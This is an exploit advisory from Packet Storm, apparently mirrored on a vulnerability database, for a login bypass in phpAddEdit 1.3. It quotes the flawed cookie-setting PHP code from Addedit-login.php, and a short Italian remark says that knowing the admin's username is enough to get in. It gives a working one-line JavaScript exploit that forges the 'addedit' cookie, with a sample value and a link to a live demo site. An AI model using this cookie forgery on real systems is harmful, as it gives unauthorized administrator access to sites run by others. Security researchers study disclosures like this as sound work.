Search...

phpAddEdit 1.3 Login Bypass

2008-12-12T00:00:00

ID PACKETSTORM:72904
Type packetstorm
Reporter X0r
Modified 2008-12-12T00:00:00

Description

                                        
                                            `-------------------------------------  
PhpAddEdit 1.3 Login By Pass   
-------------------------------------  
  
Found By: x0r ( Evolution Team )  
Email: andry2000@hotmail.it  
-------------------------------------  
  
Bug In: Addedit-login.php  
  
if (!$login_error) {  
// --- Set admin cookie so favorite form field will show up when I use  
the site...  
if ($_POST["rememberme"]) {  
$expire = mktime(0,0,0,date("m"),date("d")+120,date("Y"));  
setcookie("addedit", $_POST["adminuser"], $expire, "/", "", 0);  
} else {  
setcookie("addedit", $_POST["adminuser"]);  
}  
Header("Location: ./");  
}  
}  
  
Ci basta conoscere l'username dell'admin per bypassare il login :P ^ ^  
-------------------------------------  
  
Exploit:  
  
javascript:document.cookie = "addedit=[adminuser]; path=/";  
  
es:  
  
javascript:document.cookie = "addedit=x0r; path=/";  
--------------------------------------  
Live Demo: http://www.phpaddedit.com/demo/  
--------------------------------------  
Greetz: Amore oggi +65 ti amo troppo.  
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:72904", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpAddEdit 1.3 Login Bypass", "description": "", "published": "2008-12-12T00:00:00", "modified": "2008-12-12T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/72904/phpAddEdit-1.3-Login-Bypass.html", "reporter": "X0r", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:17:51", "viewCount": 0, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-11-03T10:17:51", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:17:51", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/72904/phpaddedit-bypass.txt", "sourceData": "`------------------------------------- \nPhpAddEdit 1.3 Login By Pass \n------------------------------------- \n \nFound By: x0r ( Evolution Team ) \nEmail: andry2000@hotmail.it \n------------------------------------- \n \nBug In: Addedit-login.php \n \nif (!$login_error) { \n// --- Set admin cookie so favorite form field will show up when I use \nthe site... \nif ($_POST[\"rememberme\"]) { \n$expire = mktime(0,0,0,date(\"m\"),date(\"d\")+120,date(\"Y\")); \nsetcookie(\"addedit\", $_POST[\"adminuser\"], $expire, \"/\", \"\", 0); \n} else { \nsetcookie(\"addedit\", $_POST[\"adminuser\"]); \n} \nHeader(\"Location: ./\"); \n} \n} \n \nCi basta conoscere l'username dell'admin per bypassare il login :P ^ ^ \n------------------------------------- \n \nExploit: \n \njavascript:document.cookie = \"addedit=[adminuser]; path=/\"; \n \nes: \n \njavascript:document.cookie = \"addedit=x0r; path=/\"; \n-------------------------------------- \nLive Demo: http://www.phpaddedit.com/demo/ \n-------------------------------------- \nGreetz: Amore oggi +65 ti amo troppo. \n \n \n`\n"}